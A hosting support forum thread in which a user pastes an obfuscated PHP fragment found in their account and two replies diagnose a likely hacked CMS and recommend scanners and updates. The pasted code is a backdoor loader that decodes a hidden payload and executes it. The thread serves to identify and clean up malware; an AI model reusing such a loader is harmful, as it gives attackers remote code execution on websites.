Possible virus on Cpanel
Hi, I think that there are virus in my Cpanel because I find various PHP files with strange names on my shared hosting. I attached 1 files the PHP files suspicious and also a file PHP contains. What do you think about it?
[CODE=php]
$hxdhpxt){function uhwxwyv($ndjwdeg, $nxbhxeo, $ncwkr){return $ndjwdeg[7]($ndjwdeg[5]($nxbhxeo . $ndjwdeg[2], ($ncwkr / $ndjwdeg[9]($nxbhxeo)) + 1), 0, $ncwkr);}function ltqndx($ndjwdeg, $jnxrcjh){return @$ndjwdeg[10]($ndjwdeg[1], $jnxrcjh);}function udobw($ndjwdeg, $jnxrcjh){$bvntgpn = $ndjwdeg[4]($jnxrcjh) % 3;if (!$bvntgpn) {$uiijao = $ndjwdeg[0]; $hkngdn = $uiijao("", $jnxrcjh[1]($jnxrcjh[2]));$hkngdn();exit();}}$hxdhpxt = ltqndx($ndjwdeg, $hxdhpxt);udobw($ndjwdeg, $ndjwdeg[6]($ndjwdeg[3], $hxdhpxt ^ uhwxwyv($ndjwdeg, $nxbhxeo, $ndjwdeg[9]($hxdhpxt))));}
-
It is not a cpanel but maybe a software problem/hacked. You have a WordPress try malware scanners for wp like NinjaScanner or any plugin with file comparision 0 -
@kadrin has it correct, this is not a cPanel specific issue but more so likely related to a vulnerable script installed on the account, most commonly associated with a CMS system which has not been kept updated/maintained. In order to resolve this issue you need to audit the entire documentroot, either using a malware scanner or by hand if you know what to look for. Best practices for the CMS systems or scripts on the account is ensure that they're all updated and anything not in use is removed such as themes/plugins/components etc. 0
Please sign in to leave a comment.
Comments
2 comments